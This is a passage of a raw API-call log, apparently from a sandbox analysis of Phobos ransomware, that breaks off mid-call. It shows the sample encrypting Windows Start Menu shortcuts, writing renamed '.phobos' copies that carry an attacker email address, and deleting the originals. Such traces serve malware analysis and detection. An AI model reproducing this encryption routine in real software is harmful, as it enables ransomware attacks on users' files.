[0176.840] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.841] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1899) returned 1 [0176.841] CloseHandle (hObject=0x14c) returned 1 [0176.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk")) returned 0x20 [0176.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.841] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.842] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.842] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.842] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.842] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.842] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.842] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x76b, lpOverlapped=0x0) returned 1 [0176.849] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x770, dwBufLen=0x770 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x770) returned 1 [0176.849] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x770, lpOverlapped=0x0) returned 1 [0176.850] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0176.850] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.850] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.850] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.850] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.850] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.850] CloseHandle (hObject=0x14c) returned 1 [0176.850] CloseHandle (hObject=0x188) returned 1 [0176.850] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\windows powershell\\windows powershell.lnk")) returned 1 [0176.856] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.856] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.856] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1294) returned 1 [0176.857] CloseHandle (hObject=0x188) returned 1 [0176.857] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk")) returned 0x20 [0176.857] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.857] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.857] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.857] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.857] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.942] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0176.942] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.942] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x50e, lpOverlapped=0x0) returned 1 [0176.961] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x510, dwBufLen=0x510 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x510) returned 1 [0176.961] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x510, lpOverlapped=0x0) returned 1 [0176.962] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0176.962] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.962] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.962] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.962] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.962] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.962] CloseHandle (hObject=0x188) returned 1 [0176.962] CloseHandle (hObject=0x190) returned 1 [0176.962] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Computer Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\computer management.lnk")) returned 1 [0176.963] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.963] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.964] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1232) returned 1 [0176.964] CloseHandle (hObject=0x190) returned 1 [0176.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk")) returned 0x20 [0176.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.964] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.964] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.964] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.964] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.964] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0176.964] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.965] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4d0, lpOverlapped=0x0) returned 1 [0176.986] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4e0) returned 1 [0176.986] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4e0, lpOverlapped=0x0) returned 1 [0176.987] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0176.987] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.987] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.987] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.987] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.987] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.987] CloseHandle (hObject=0x190) returned 1 [0176.987] CloseHandle (hObject=0x188) returned 1 [0176.987] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Performance Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\performance monitor.lnk")) returned 1 [0176.989] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.989] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.989] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1248) returned 1 [0176.989] CloseHandle (hObject=0x188) returned 1 [0176.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk")) returned 0x20 [0176.990] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.990] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.990] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.990] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.990] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.992] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0176.992] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.992] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4e0, lpOverlapped=0x0) returned 1 [0177.006] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4f0) returned 1 [0177.006] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4f0, lpOverlapped=0x0) returned 1 [0177.007] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0177.007] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.007] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0177.007] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.007] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0177.007] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.007] CloseHandle (hObject=0x188) returned 1 [0177.007] CloseHandle (hObject=0x190) returned 1 [0177.007] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Security Configuration Management.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\security configuration management.lnk")) returned 1 [0177.008] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.008] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.008] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1246) returned 1 [0177.009] CloseHandle (hObject=0x190) returned 1 [0177.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk")) returned 0x20 [0177.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.009] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.009] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.009] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.009] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.009] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.009] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.009] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4de, lpOverlapped=0x0) returned 1 [0177.019] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4e0) returned 1 [0177.019] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4e0, lpOverlapped=0x0) returned 1 [0177.020] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0177.020] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.020] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0177.020] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.020] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0177.020] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.020] CloseHandle (hObject=0x190) returned 1 [0177.020] CloseHandle (hObject=0x188) returned 1 [0177.020] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\system configuration.lnk")) returned 1 [0177.045] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.046] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1274) returned 1 [0177.046] CloseHandle (hObject=0x188) returned 1 [0177.046] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk")) returned 0x20 [0177.046] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 